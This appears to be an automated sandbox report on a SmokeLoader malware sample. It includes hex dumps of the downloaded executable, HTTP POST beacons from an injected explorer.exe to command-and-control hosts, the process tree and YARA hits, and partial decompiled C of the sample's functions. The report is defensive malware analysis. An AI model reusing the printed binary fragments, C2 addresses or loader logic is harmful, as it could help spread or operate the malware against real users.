00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 06 03 00 00 10 00 00 00 08 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c0 41 7b 01 00 20 03 00 00 14 00 00 00 0c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 67 00 00 00 70 7e 01 00 68 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 a8 14 01 00 00 e0 7e 01 00 16 01 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 12 03 00 00 00 00 00 a6 12 03 00 00 00 00 00 70 03 03 00 8e 03 03 00 9c 03 03 00 a8 03 03 00 ba 03 03 00 da 03 03 00 ee 03 03 00 04 04 03 00 16 04 03 00 2c
            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#pppWppbppVppoppppSppfppappRichpPEL*}_| | @k,xp~g~ Hz@.text( `.dataA{ @.rsrcgp~h @@.reloc~@Bp,
            Nov 25, 2021 18:24:50.919063091 CET | 7 | IN | Data Raw: 04 03 00 3a 04 03 00 52 04 03 00 62 04 03 00 74 04 03 00 82 04 03 00 a2 04 03 00 c0 04 03 00 d0 04 03 00 ee 04 03 00 00 05 03 00 14 05 03 00 2c 05 03 00 48 05 03 00 5e 05 03 00 6e 05 03 00 86 05 03 00 9a 05 03 00 ac 05 03 00 c4 05 03 00 d8 05 03
            Data Ascii: :Rbt,H^n,>Jbl <Pj|$6N^x
            Nov 25, 2021 18:24:50.919090033 CET | 8 | IN | Data Raw: 00 73 00 5c 00 63 00 72 00 74 00 5f 00 62 00 6c 00 64 00 5c 00 73 00 65 00 6c 00 66 00 5f 00 78 00 38 00 36 00 5c 00 63 00 72 00 74 00 5c 00 73 00 72 00 63 00 5c 00 73 00 74 00 64 00 65 00 6e 00 76 00 70 00 2e 00 63 00 00 00 00 00 66 3a 5c 64 64
            Data Ascii: s\crt_bld\self_x86\crt\src\stdenvp.cf:\dd\vctools\crt_bld\self_x86\crt\src\stdenvp.cf:\dd\vctools\crt_bld\self_x86\crt\src\stdargv.cf:\dd\vctools\crt_bld\self_x86\crt\src\w_env.cf:\dd\vctools\
            Nov 25, 2021 18:24:50.919117928 CET | 9 | IN | Data Raw: 61 74 65 64 20 61 74 20 25 68 73 28 25 64 29 2e 0a 00 00 43 6c 69 65 6e 74 20 68 6f 6f 6b 20 72 65 2d 61 6c 6c 6f 63 61 74 69 6f 6e 20 66 61 69 6c 75 72 65 2e 0a 00 43 6c 69 65 6e 74 20 68 6f 6f 6b 20 72 65 2d 61 6c 6c 6f 63 61 74 69 6f 6e 20 66
            Data Ascii: ated at %hs(%d).Client hook re-allocation failure.Client hook re-allocation failure at file %hs line %d.pUserData != NULL_pFirstBlock == pHead_pLastBlock == pHeadpHea
            Nov 25, 2021 18:24:50.919147968 CET | 11 | IN | Data Raw: 6f 72 79 20 61 6c 6c 6f 63 61 74 65 64 20 61 74 20 25 68 73 28 25 64 29 2e 0a 00 00 00 48 45 41 50 20 43 4f 52 52 55 50 54 49 4f 4e 20 44 45 54 45 43 54 45 44 3a 20 6f 6e 20 74 6f 70 20 6f 66 20 46 72 65 65 20 62 6c 6f 63 6b 20 61 74 20 30 78 25
            Data Ascii: ory allocated at %hs(%d).HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the
            Nov 25, 2021 18:24:50.919182062 CET12INData Raw: 73 3e 20 25 73 0a 00 28 00 2a 00 5f 00 65 00 72 00 72 00 6e 00 6f 00 28 00 29 00 29 00 00 00 5f 00 70 00 72 00 69 00 6e 00 74 00 4d 00 65 00 6d 00 42 00 6c 00 6f 00 63 00 6b 00 44 00 61 00 74 00 61 00 00 00 00 00 25 2e 32 58 20 00 00 00 44 65 74
            Data Ascii: s> %s(*_errno())_printMemBlockData%.2X Detected memory leaks!f:\dd\vctools\crt_bld\self_x86\crt\src\tidtable.cFlsFreeFlsSetValueFlsGetValueFlsAllocKERNEL32.DLLruntime
            Nov 25, 2021 18:24:50.919210911 CET14INData Raw: 00 73 00 70 00 61 00 63 00 65 00 20 00 66 00 6f 00 72 00 20 00 6c 00 6f 00 77 00 69 00 6f 00 20 00 69 00 6e 00 69 00 74 00 69 00 61 00 6c 00 69 00 7a 00 61 00 74 00 69 00 6f 00 6e 00 0d 00 0a 00 00 00 00 00 00 00 00 00 52 00 36 00 30 00 32 00 36
            Data Ascii: space for lowio initializationR6026- not enough space for stdio initializationR6025- pure virtual functio
            Nov 25, 2021 18:24:50.919248104 CET15INData Raw: 00 6f 00 75 00 74 00 6d 00 73 00 67 00 2c 00 20 00 28 00 73 00 69 00 7a 00 65 00 6f 00 66 00 28 00 6f 00 75 00 74 00 6d 00 73 00 67 00 29 00 20 00 2f 00 20 00 73 00 69 00 7a 00 65 00 6f 00 66 00 28 00 6f 00 75 00 74 00 6d 00 73 00 67 00 5b 00 30
            Data Ascii: outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), error_text)wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"\
            Nov 25, 2021 18:24:50.919274092 CET16INData Raw: 00 62 00 6c 00 64 00 5c 00 73 00 65 00 6c 00 66 00 5f 00 78 00 38 00 36 00 5c 00 63 00 72 00 74 00 5c 00 73 00 72 00 63 00 5c 00 64 00 62 00 67 00 72 00 70 00 74 00 2e 00 63 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 56
            Data Ascii: bld\self_x86\crt\src\dbgrpt.cMicrosoft Visual C++ Debug Library_CrtDbgReport: String too long or IO Errorwcscpy_s(sz
            Nov 25, 2021 18:24:50.919302940 CET18INData Raw: 00 72 00 63 00 29 00 29 00 29 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 00 00 00 00 77 00 63 00 73 00 63 00 70 00 79 00 5f 00 73 00 00 00 00 00 66 00 3a 00 5c 00 64 00 64 00 5c 00 76 00 63 00 74 00 6f 00 6f 00 6c 00 73 00 5c 00 63 00 72
            Data Ascii: rc))) != NULLwcscpy_sf:\dd\vctools\crt_bld\self_x86\crt\src\tcscpy_s.inl((_Dst)) != NULL && ((_SizeInWords)) > 0...
            Nov 25, 2021 18:24:50.947226048 CET18INData Raw: 00 63 00 61 00 74 00 65 00 67 00 6f 00 72 00 79 00 5b 00 63 00 61 00 74 00 65 00 67 00 6f 00 72 00 79 00 5d 00 2e 00 77 00 72 00 65 00 66 00 63 00 6f 00 75 00 6e 00 74 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 29 00 29 00 20 00 7c 00 7c
            Data Ascii: category[category].wrefcount != NULL)) || ((ptloci->lc_category[category].wlocale == NULL) && (ptloci->lc_category[catego


            Session ID: 3, Source IP: 192.168.2.4, Source Port: 49717, Destination IP: 212.192.241.249, Destination Port: 80, Process: C:\Windows\explorer.exe
            Timestamp | kBytes transferred | Direction | Data
            Nov 25, 2021 18:24:57.333904028 CET | 322 | OUT | POST / HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://tpjfndspxp.com/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 306
            Host: xacokuo80.top
            Nov 25, 2021 18:24:57.333946943 CET | 323 | OUT | Data Raw: POST body (306 bytes per Content-Length; hex dump omitted)
            Nov 25, 2021 18:24:59.157474995 CET | 323 | OUT | POST / HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://tpjfndspxp.com/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 306
            Host: xacokuo80.top
            Data Raw: POST body (306 bytes per Content-Length; hex dump omitted)
            Nov 25, 2021 18:25:02.445750952 CET | 324 | OUT | POST / HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://tpjfndspxp.com/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 306
            Host: xacokuo80.top
            Data Raw: POST body (306 bytes per Content-Length; hex dump omitted)
            Nov 25, 2021 18:25:02.829710007 CET | 324 | IN | HTTP/1.1 404 Not Found
            Server: nginx/1.20.1
            Date: Thu, 25 Nov 2021 17:25:02 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at xacokuo80.top Port 80</address></body></html>0


            Code Manipulations

            Statistics

            CPU Usage


            Memory Usage


            High Level Behavior Distribution


            Behavior


            System Behavior

            General

            Start time:18:23:59
            Start date:25/11/2021
            Path:C:\Users\user\Desktop\qhQ6armJ25.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\qhQ6armJ25.exe"
            Imagebase:0x400000
            File size:304128 bytes
            MD5 hash:9953ACB0FEE6C45FC5AA12D21AC3AD1B
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low

            General

            Start time:18:24:07
            Start date:25/11/2021
            Path:C:\Users\user\Desktop\qhQ6armJ25.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\qhQ6armJ25.exe"
            Imagebase:0x400000
            File size:304128 bytes
            MD5 hash:9953ACB0FEE6C45FC5AA12D21AC3AD1B
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.765681019.0000000000640000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.765917923.0000000002051000.00000004.00020000.sdmp, Author: Joe Security
            Reputation:low

            General

            Start time:18:24:14
            Start date:25/11/2021
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\Explorer.EXE
            Imagebase:0x7ff6fee60000
            File size:3933184 bytes
            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000000.748566688.0000000004F01000.00000020.00020000.sdmp, Author: Joe Security
            Reputation:high

            General

            Start time:18:24:50
            Start date:25/11/2021
            Path:C:\Users\user\AppData\Roaming\gahfeaj
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Roaming\gahfeaj
            Imagebase:0x400000
            File size:304128 bytes
            MD5 hash:9953ACB0FEE6C45FC5AA12D21AC3AD1B
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Antivirus matches:
            • Detection: 100%, Joe Sandbox ML
            Reputation:low

            General

            Start time:18:24:55
            Start date:25/11/2021
            Path:C:\Users\user\AppData\Local\Temp\D380.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Local\Temp\D380.exe
            Imagebase:0x400000
            File size:302592 bytes
            MD5 hash:61BA8F1EDCD03481D6447E8EC34DC383
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Antivirus matches:
            • Detection: 100%, Joe Sandbox ML
            Reputation:low

            General

            Start time:18:25:02
            Start date:25/11/2021
            Path:C:\Users\user\AppData\Roaming\gahfeaj
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Roaming\gahfeaj
            Imagebase:0x400000
            File size:304128 bytes
            MD5 hash:9953ACB0FEE6C45FC5AA12D21AC3AD1B
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.834313384.0000000000460000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.834484758.00000000005A1000.00000004.00020000.sdmp, Author: Joe Security
            Reputation:low

            General

            Start time:18:25:03
            Start date:25/11/2021
            Path:C:\Users\user\AppData\Local\Temp\D380.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Local\Temp\D380.exe
            Imagebase:0x400000
            File size:302592 bytes
            MD5 hash:61BA8F1EDCD03481D6447E8EC34DC383
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low

            Disassembly

            Code Analysis


              Executed Functions

              APIs
              • RtlEncodePointer.NTDLL(00000000,?,00418A4B,?,?,0041BD70), ref: 0041BC07
              Memory Dump Source
              • Source File: 00000000.00000002.700846503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.700841214.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000000.00000002.700881137.0000000000432000.00000004.00020000.sdmp
              • Associated: 00000000.00000002.701019216.0000000001BE7000.00000002.00020000.sdmp
              Similarity
              • API ID: EncodePointer
              • String ID:
              • API String ID: 2118026453-0
              • Opcode ID: a528107365260690eca2297320ffcab8555c696c8f299497a78d2406f656ae07
              • Instruction ID: 4c13a0147dd8f3d25c0cd769b131019baa22d82fb8018cff146273db6aecf152
              • Opcode Fuzzy Hash: a528107365260690eca2297320ffcab8555c696c8f299497a78d2406f656ae07
              • Instruction Fuzzy Hash: 6FA0243104430C73D10033C37C0DF017F4CC3C0731F000011F50C114510D715400405D
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			_entry_() {
              				void* _t3;
              
              				E00418430(); // executed
              				return L00418140(_t3);
              			}





              APIs
              • ___security_init_cookie.LIBCMTD ref: 00418125
              Memory Dump Source
              • Source File: 00000000.00000002.700846503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.700841214.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000000.00000002.700881137.0000000000432000.00000004.00020000.sdmp
              • Associated: 00000000.00000002.701019216.0000000001BE7000.00000002.00020000.sdmp
              Similarity
              • API ID: ___security_init_cookie
              • String ID:
              • API String ID: 3657697845-0
              • Opcode ID: 171c28b58462050255cb6f92a214f913f529165168e82ffd83e58af334052e97
              • Instruction ID: df0ab9435598a95d88b4262df021c7656cb327ba73e54f0977e42e4a19cb12ce
              • Opcode Fuzzy Hash: 171c28b58462050255cb6f92a214f913f529165168e82ffd83e58af334052e97
              • Instruction Fuzzy Hash: 4DA0023201465926019037A7450798B754D4AC075C7D6011E7958021032E5CA88240AE
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              C-Code - Quality: 85%
              			E004202D0(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
              				intOrPtr _v0;
              				void* _v804;
              				intOrPtr _v808;
              				intOrPtr _v812;
              				intOrPtr _t6;
              				intOrPtr _t11;
              				long _t15;
              				intOrPtr _t19;
              				intOrPtr _t20;
              				intOrPtr _t21;
              				intOrPtr _t22;
              				intOrPtr _t23;
              				intOrPtr _t24;
              				intOrPtr _t25;
              				intOrPtr* _t29;
              				void* _t34;
              
              				_t25 = __esi;
              				_t24 = __edi;
              				_t22 = __edx;
              				_t20 = __ecx;
              				_t19 = __ebx;
              				_t6 = __eax;
              				_t34 = _t20 -  *0x432064; // 0x9b798147
              				if(_t34 == 0) {
              					asm("repe ret");
              				}
              				 *0x433b68 = _t6;
              				 *0x433b64 = _t20;
              				 *0x433b60 = _t22;
              				 *0x433b5c = _t19;
              				 *0x433b58 = _t25;
              				 *0x433b54 = _t24;
              				 *0x433b80 = ss;
              				 *0x433b74 = cs;
              				 *0x433b50 = ds;
              				 *0x433b4c = es;
              				 *0x433b48 = fs;
              				 *0x433b44 = gs;
              				asm("pushfd");
              				_pop( *0x433b78);
              				 *0x433b6c =  *_t29;
              				 *0x433b70 = _v0;
              				 *0x433b7c =  &_a4;
              				 *0x433ab8 = 0x10001;
              				_t11 =  *0x433b70; // 0x0
              				 *0x433a6c = _t11;
              				 *0x433a60 = 0xc0000409;
              				 *0x433a64 = 1;
              				_t21 =  *0x432064; // 0x9b798147
              				_v812 = _t21;
              				_t23 =  *0x432068; // 0x64867eb8
              				_v808 = _t23;
              				 *0x433ab0 = IsDebuggerPresent();
              				_push(1);
              				E0041F720(_t12);
              				SetUnhandledExceptionFilter(0);
              				_t15 = UnhandledExceptionFilter("`:C");
              				if( *0x433ab0 == 0) {
              					_push(1);
              					E0041F720(_t15);
              				}
              				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
              			}


              APIs
              • IsDebuggerPresent.KERNEL32 ref: 00424A4D
              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00424A64
              • UnhandledExceptionFilter.KERNEL32(`:C), ref: 00424A6F
              • GetCurrentProcess.KERNEL32(C0000409), ref: 00424A8D
              • TerminateProcess.KERNEL32(00000000), ref: 00424A94
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.700846503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.700841214.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000000.00000002.700881137.0000000000432000.00000004.00020000.sdmp
              • Associated: 00000000.00000002.701019216.0000000001BE7000.00000002.00020000.sdmp
              Similarity
              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
              • String ID: `:C
              • API String ID: 2579439406-2112543841
              • Opcode ID: ce5a9cd8f32a94825b97e140470348ba9d4a05fb146796b75582730bf51f6bfd
              • Instruction ID: e2b7c7c08dc63ef365ebcfff93dd5ecbf84560ad903b69aed1d0ec8e16751b0f
              • Opcode Fuzzy Hash: ce5a9cd8f32a94825b97e140470348ba9d4a05fb146796b75582730bf51f6bfd
              • Instruction Fuzzy Hash: AA21D2B8904304EBE710DF69FD44644BBA4FB08316F10617AE90993772E7796A85CF4D
              Uniqueness

              Uniqueness Score: -1.00%

              Executed Functions

              C-Code - Quality: 100%
              			E00401812(void* __edx) {
              				void* _t4;
              
              				 *((intOrPtr*)(_t4 - 0x77)) =  *((intOrPtr*)(_t4 - 0x77)) + __edx;
              			}





              APIs
              • Sleep.KERNELBASE(00001388), ref: 00401854
              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040187C
              Memory Dump Source
              • Source File: 00000001.00000002.765609356.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: ProcessSleepTerminate
              • String ID:
              • API String ID: 417527130-0
              • Opcode ID: a9242262985629b7ba65b23d5e149a247a5822ccc711938d973886dc562d5c51
              • Instruction ID: 66c4bf53945efb9eac17a29b63d6e60a7dc9cc17017cfcbb6067bf93f0ee6b10
              • Opcode Fuzzy Hash: a9242262985629b7ba65b23d5e149a247a5822ccc711938d973886dc562d5c51
              • Instruction Fuzzy Hash: EC011277548205EBEB007AA59C41AAA37289B05754F34C537FA12B80F1D67D8713A71F
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 70%
              			E00401813(void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
              				char _v8;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				intOrPtr _t8;
              				void* _t11;
              				void* _t13;
              				void* _t16;
              				intOrPtr* _t17;
              				void* _t19;
              				void* _t20;
              				void* _t21;
              				void* _t22;
              				intOrPtr* _t23;
              
              				_t25 = __eflags;
              				_push(0x184c);
              				_t8 =  *_t23;
              				L0040113B(_t8, _t16, 0x5c, _t21, _t22, __eflags);
              				_t17 = _a4;
              				Sleep(0x1388);
              				_t11 = L0040138D(_t20, _t25, _t17, _a8, _a12,  &_v8); // executed
              				_t26 = _t11;
              				if(_t11 != 0) {
              					L00401460(_t17, _t20, _t21, _t22, _t26, _t17, _t11, _v8, _a16); // executed
              				}
              				 *_t17(0xffffffff, 0); // executed
              				_t13 = 0x184c;
              				_t19 = 0x5c;
              				return L0040113B(_t13, _t17, _t19, _t21, _t22, _t26);
              			}


              APIs
              • Sleep.KERNELBASE(00001388), ref: 00401854
              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040187C
              Memory Dump Source
              • Source File: 00000001.00000002.765609356.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: ProcessSleepTerminate
              • String ID:
              • API String ID: 417527130-0
              • Opcode ID: 89745b0bfaaf1c7b55dfe8fa037d4d7c0223a41cfa17f4c26d190fbbe19b2ead
              • Instruction ID: 7d9be0058e33673f170ed7bdf9e45501506609fca6745517c781ff617e647718
              • Opcode Fuzzy Hash: 89745b0bfaaf1c7b55dfe8fa037d4d7c0223a41cfa17f4c26d190fbbe19b2ead
              • Instruction Fuzzy Hash: 9A014F77608205FBEB007AA59C41EBA362C9B04754F24C437BA03B80F1DA7C9712A76F
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 65%
              			E00401830(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
              				intOrPtr _t8;
              				void* _t11;
              				void* _t13;
              				intOrPtr* _t17;
              				void* _t20;
              				void* _t26;
              				intOrPtr* _t28;
              
              				_t31 = __eflags;
              				_t24 = __esi;
              				_t22 = __edi;
              				_t21 = __edx;
              				_push(__edx);
              				_push(0x184c);
              				_t8 =  *_t28;
              				L0040113B(_t8, __ebx, 0x5c, __edi, __esi, __eflags);
              				_t17 =  *((intOrPtr*)(_t26 + 8));
              				Sleep(0x1388);
              				_t11 = L0040138D(_t21, _t31, _t17,  *((intOrPtr*)(_t26 + 0xc)),  *((intOrPtr*)(_t26 + 0x10)), _t26 - 4); // executed
              				_t32 = _t11;
              				if(_t11 != 0) {
              					L00401460(_t17, _t21, _t22, __esi, _t32, _t17, _t11,  *((intOrPtr*)(_t26 - 4)),  *((intOrPtr*)(_t26 + 0x14))); // executed
              				}
              				 *_t17(0xffffffff, 0); // executed
              				_t13 = 0x184c;
              				_t20 = 0x5c;
              				return L0040113B(_t13, _t17, _t20, _t22, _t24, _t32);
              			}


              APIs
              • Sleep.KERNELBASE(00001388), ref: 00401854
              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040187C
              Memory Dump Source
              • Source File: 00000001.00000002.765609356.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: ProcessSleepTerminate
              • String ID:
              • API String ID: 417527130-0
              • Opcode ID: f0b3e7d236e0b2aebba72a48561d88988893c2cfd0a9863272573b7202c77ad1
              • Instruction ID: deb966eb77b9a567301be81d0aa6add722e5d663e7a56bf983217a5254dc7aad
              • Opcode Fuzzy Hash: f0b3e7d236e0b2aebba72a48561d88988893c2cfd0a9863272573b7202c77ad1
              • Instruction Fuzzy Hash: D9F0E677608205EBEB007A959C41EBA36289B04755F34C437BA13B90F1DA7D9712A72F
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 79%
              			E00401833(void* __ebx, void* __edi, void* __esi, void* __eflags) {
              				void* __ecx;
              				void* _t8;
              				void* _t11;
              				void* _t13;
              				intOrPtr* _t17;
              				void* _t21;
              				void* _t22;
              				void* _t27;
              
              				_t30 = __eflags;
              				_t25 = __esi;
              				_t23 = __edi;
              				L0040113B(_t8, __ebx, 0x5c, __edi, __esi, __eflags);
              				_t17 =  *((intOrPtr*)(_t27 + 8));
              				Sleep(0x1388);
              				_t11 = L0040138D(_t22, _t30, _t17,  *((intOrPtr*)(_t27 + 0xc)),  *((intOrPtr*)(_t27 + 0x10)), _t27 - 4); // executed
              				_t31 = _t11;
              				if(_t11 != 0) {
              					L00401460(_t17, _t22, _t23, __esi, _t31, _t17, _t11,  *((intOrPtr*)(_t27 - 4)),  *((intOrPtr*)(_t27 + 0x14))); // executed
              				}
              				 *_t17(0xffffffff, 0); // executed
              				_t13 = 0x184c;
              				_t21 = 0x5c;
              				return L0040113B(_t13, _t17, _t21, _t23, _t25, _t31);
              			}


              APIs
              • Sleep.KERNELBASE(00001388), ref: 00401854
              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040187C
              Memory Dump Source
              • Source File: 00000001.00000002.765609356.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: ProcessSleepTerminate
              • String ID:
              • API String ID: 417527130-0
              • Opcode ID: 3be197aa96b37fb01e35ccc665f06a57c5b22eeab7c7f1fa4e7c4c0b74a31191
              • Instruction ID: 618970b1dbb32a4db62a2ca4bba0e2ab9b1e6011c78eec4eed3c6938ee6c48e5
              • Opcode Fuzzy Hash: 3be197aa96b37fb01e35ccc665f06a57c5b22eeab7c7f1fa4e7c4c0b74a31191
              • Instruction Fuzzy Hash: DFF01277604205FBEB047AE19C41EBA36289B04755F24C537BA13B80F1DA3C8712A72F
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 63%
              			E00401836(void* __ebx, void* __edi, void* __esi, void* __eflags) {
              				void* _t8;
              				void* _t11;
              				void* _t13;
              				intOrPtr* _t17;
              				void* _t20;
              				void* _t21;
              				void* _t23;
              				void* _t27;
              
              				_t30 = __eflags;
              				_t25 = __esi;
              				_t23 = __edi - 1;
              				asm("invalid");
              				asm("int 0x8e");
              				L0040113B(_t8, __ebx, 0x5c, _t23, __esi, __eflags);
              				_t17 =  *((intOrPtr*)(_t27 + 8));
              				Sleep(0x1388);
              				_t11 = L0040138D(_t21, _t30, _t17,  *((intOrPtr*)(_t27 + 0xc)),  *((intOrPtr*)(_t27 + 0x10)), _t27 - 4); // executed
              				_t31 = _t11;
              				if(_t11 != 0) {
              					L00401460(_t17, _t21, _t23, __esi, _t31, _t17, _t11,  *((intOrPtr*)(_t27 - 4)),  *((intOrPtr*)(_t27 + 0x14))); // executed
              				}
              				 *_t17(0xffffffff, 0); // executed
              				_t13 = 0x184c;
              				_t20 = 0x5c;
              				return L0040113B(_t13, _t17, _t20, _t23, _t25, _t31);
              			}

              APIs
              • Sleep.KERNELBASE(00001388), ref: 00401854
              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040187C
              Memory Dump Source
              • Source File: 00000001.00000002.765609356.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: ProcessSleepTerminate
              • String ID:
              • API String ID: 417527130-0
              • Opcode ID: 6270efecb34b7a24ecfb20c25f7994d7e548ab66cc763392a0d1480e5281e59a
              • Instruction ID: a9217997abf11aa28aa6879baaed046148431452325da12b2764b37c26675c88
              • Opcode Fuzzy Hash: 6270efecb34b7a24ecfb20c25f7994d7e548ab66cc763392a0d1480e5281e59a
              • Instruction Fuzzy Hash: 17F0FF77604205FBEB01AAA19C41A6A36289F05355F248477BA12B90F1DA389652A72B
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 79%
              			E00401842(void* __ebx, void* __edi, void* __esi, void* __eflags) {
              				void* __ecx;
              				void* _t8;
              				void* _t11;
              				void* _t13;
              				intOrPtr* _t17;
              				void* _t21;
              				void* _t27;
              
              				_t30 = __eflags;
              				_t25 = __esi;
              				_t23 = __edi;
              				L0040113B(_t8, __ebx, 0x5c, __edi, __esi, __eflags);
              				_t17 =  *((intOrPtr*)(_t27 + 8));
              				Sleep(0x1388);
